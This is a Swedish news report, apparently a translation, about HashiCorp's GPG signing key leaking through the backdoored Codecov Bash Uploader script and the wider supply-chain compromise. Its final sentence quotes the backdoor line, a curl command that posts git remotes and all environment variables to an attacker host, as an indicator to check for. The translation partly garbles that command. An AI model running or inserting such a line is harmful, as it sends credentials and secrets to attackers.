HashiCorp, känt för att utveckla verktygen med öppen källkod Vagrant, Packer, Nomad och Terraform, tillkännagav läckan av den privata GPG-nyckeln som används för att skapa digitala signaturer som verifierar releaser. Angripare som fick tillgång till GPG-nyckeln kan potentiellt göra dolda ändringar i HashiCorps produkter genom att verifiera dem med en korrekt digital signatur. Samtidigt uppgav bolaget att det vid revisionen inte kunde identifieras några spår av försök till sådana ändringar.
För närvarande har den komprometterade GPG-nyckeln återkallats och en ny nyckel har införts i dess ställe. Problemet påverkade endast verifiering med SHA256SUM- och SHA256SUM.sig-filerna och påverkade inte genereringen av digitala signaturer för Linux DEB- och RPM-paket som tillhandahålls via releases.hashicorp.com, samt mekanismer för releaseverifiering för macOS och Windows (AuthentiCode) .
Läckan uppstod på grund av användningen av Codecov Bash Uploader-skriptet (codecov-bash) i infrastrukturen, utformat för att ladda ner täckningsrapporter från kontinuerliga integrationssystem. Under attacken mot Codecov-företaget gömdes en bakdörr i det angivna skriptet, genom vilket lösenord och krypteringsnycklar skickades till angriparnas server.
För att hacka utnyttjade angriparna ett fel i processen att skapa Codecov Docker-bilden, vilket gjorde det möjligt för dem att extrahera åtkomstdata till GCS (Google Cloud Storage), nödvändiga för att göra ändringar i Bash Uploader-skriptet distribuerat från codecov.io hemsida. Ändringarna gjordes tillbaka den 31 januari, förblev oupptäckta i två månader och gjorde det möjligt för angripare att extrahera information som lagrats i kunders kontinuerliga integrationssystemmiljöer. Med den tillagda skadliga koden kunde angripare få information om det testade Git-förvaret och alla miljövariabler, inklusive tokens, krypteringsnycklar och lösenord som överförs till kontinuerliga integrationssystem för att organisera åtkomst till applikationskod, arkiv och tjänster som Amazon Web Services och GitHub.
Utöver det direkta samtalet användes Codecov Bash Uploader-skriptet som en del av andra uppladdare, såsom Codecov-action (Github), Codecov-circleci-orb och Codecov-bitrise-step, vars användare också påverkas av problemet. Alla användare av codecov-bash och relaterade produkter rekommenderas att granska sina infrastrukturer, samt byta lösenord och krypteringsnycklar. Du kan kontrollera närvaron av en bakdörr i ett skript genom närvaron av raden curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /uppladdning/v2 || Sann
Källa: opennet.ru